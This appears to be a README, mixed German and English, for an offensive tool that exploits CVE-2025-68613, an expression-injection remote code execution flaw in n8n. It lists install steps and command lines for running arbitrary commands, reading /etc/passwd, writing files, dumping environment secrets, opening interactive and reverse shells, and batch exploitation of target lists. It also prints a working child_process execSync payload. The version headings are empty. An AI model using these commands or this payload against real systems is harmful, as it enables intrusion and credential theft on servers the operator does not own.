n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Workflow-Automatisierung Remote-Code-Ausführung
n8n God Mode Ultimate ist ein umfassendes Sicherheitstest-Framework, das entwickelt wurde, um CVE-2025-68613 in n8n Workflow-Automatisierungsplattformen zu erkennen und zu validieren. Diese kritische Remote-Code-Ausführungsschwachstelle (RCE) betrifft n8n-Versionen durch Expression-Injection in Workflow-Ausführungskontexten.
Betroffene Versionen:
Gepatchte Versionen:
--detect - Nur Versionserkennung (schnellste, nicht intrusiv)--safe - Sicherer Schwachstellencheck ohne Ausnutzung--poc - RCE Proof-of-Concept-Validierung--exploit - Vollständiger Exploitation-Modusread <datei> - Remote-Dateien lesenwrite <datei> <inhalt> - Dateien auf das Ziel schreiben# Python 3.8 or higher
python3 --version
# pip package manager
pip3 --version
# Clone the repository
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate
# Install required packages
pip3 install -r requirements.txt
requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6
# Display help menu
python3 n8n-godmode-ultimate.py -h
# Detect n8n version (non-intrusive)
python3 n8n-godmode-ultimate.py -u http://target:5678 --detect
# Safe vulnerability check
python3 n8n-godmode-ultimate.py -u http://target:5678 --safe -e [email protected] -p password
# Proof-of-concept RCE
python3 n8n-godmode-ultimate.py -u http://target:5678 --poc -e [email protected] -p password
# Full exploitation
python3 n8n-godmode-ultimate.py -u http://target:5678 --exploit -e [email protected] -p password
# Execute single command
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --cmd "whoami"
# Read remote file
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --read-file "/etc/passwd"
# Write remote file
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --write-file "/tmp/test.txt" --content "payload"
# Extract environment variables
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --dump-env
# Interactive shell
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --shell
# Scan multiple targets from file
python3 n8n-godmode-ultimate.py -l targets.txt --detect -t 20
# Batch exploitation
python3 n8n-godmode-ultimate.py -l targets.txt --poc -e [email protected] -p password -t 10
targets.txt Format:
http://target1:5678
https://target2.example.com
http://192.168.1.100:5678
https://n8n.example.org
Sobald Sie sich im Shell-Modus (--shell) befinden:
n8n> whoami # Execute command
n8n> read /etc/passwd # Read file
n8n> env # Show environment variables
n8n> info # System information
n8n> history # Command history
n8n> exit # Exit shell
-u, --url URL Ziel-n8n-URL
-l, --list FILE Datei mit Ziel-URLs
-t, --threads NUM Anzahl der Threads für Batch-Scanning (Standard: 10)
-e, --email EMAIL n8n-Benutzer-E-Mail
-p, --password PASS n8n-Benutzer-Passwort
--detect Nur Versionserkennung (schnellste)
--safe Sicherer Check ohne Ausnutzung
--poc RCE Proof-of-Concept
--exploit Vollständiger Exploitation-Modus
--god God-Mode aktivieren
--cmd COMMAND Einzelnen Befehl ausführen
--read-file PATH Remote-Datei lesen
--write-file PATH Remote-Datei schreiben
--content DATA Inhalt für Schreiboperation
--dump-env Alle Umgebungsvariablen extrahieren
--shell Interaktiver Shell-Modus
--revshell HOST:PORT Reverse-Shell-Payload
--mode MODE Exploit-Modus: schedule|webhook|code|expression (Standard: schedule)
--timeout SEC Befehls-Timeout in Sekunden (Standard: 30)
--cleanup Workflows nach Ausführung löschen
-k, --insecure SSL-Verifikation deaktivieren
-v, --verbose Ausführliche Ausgabe
-q, --quiet Minimale Ausgabe
Erstellt einen Workflow mit einem geplanten Trigger, der alle 3 Sekunden automatisch ausgeführt wird. Zuverlässigste Methode.
Payload: {{(function(){
return this.process.mainModule.require('child_process')
.execSync('whoami').toString()
})()}}
Erstellt einen HTTP-Webhook-Endpunkt, der bei Auslösung Befehle ausführt.
Injiziert Code direkt in einen Code-Node mit child_process-Zugriff.
Manuelle Ausführung über das Expressionsauswertungssystem von n8n.